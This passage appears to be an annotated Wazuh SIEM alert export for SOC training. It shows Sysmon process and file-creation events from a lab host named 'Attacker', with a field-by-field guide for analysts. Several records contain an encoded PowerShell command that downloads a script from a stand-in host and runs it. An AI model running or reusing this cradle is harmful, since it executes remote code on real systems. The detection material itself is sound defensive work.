data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:11.0019319Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350641
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:09.719 ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ProcessId: 2932 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ParentProcessId: 15128 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:09.719
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:13.889+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:13.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  128
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535373.2792287
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:11.2971818Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350642
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:11.257 ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ProcessId: 2932 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pvs24fpt.wtt.ps1 CreationUtcTime: 2025-04-24 22:56:11.257 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:11.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pvs24fpt.wtt.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:11.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:16.392+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:16.392+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  125
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535376.2795052
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:13.9948115Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350673
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:12.688 ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ProcessId: 1724 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ParentProcessId: 2932 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:12.688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:16.396+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:16.396+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  129
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535376.2803115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:14.2252877Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350674
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:14.198 ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ProcessId: 1724 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_xdqtovfm.esx.ps1 CreationUtcTime: 2025-04-24 22:56:14.198 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:14.198
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xdqtovfm.esx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:14.198
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:21.110+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:21.110+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  126
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535381.2805880
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
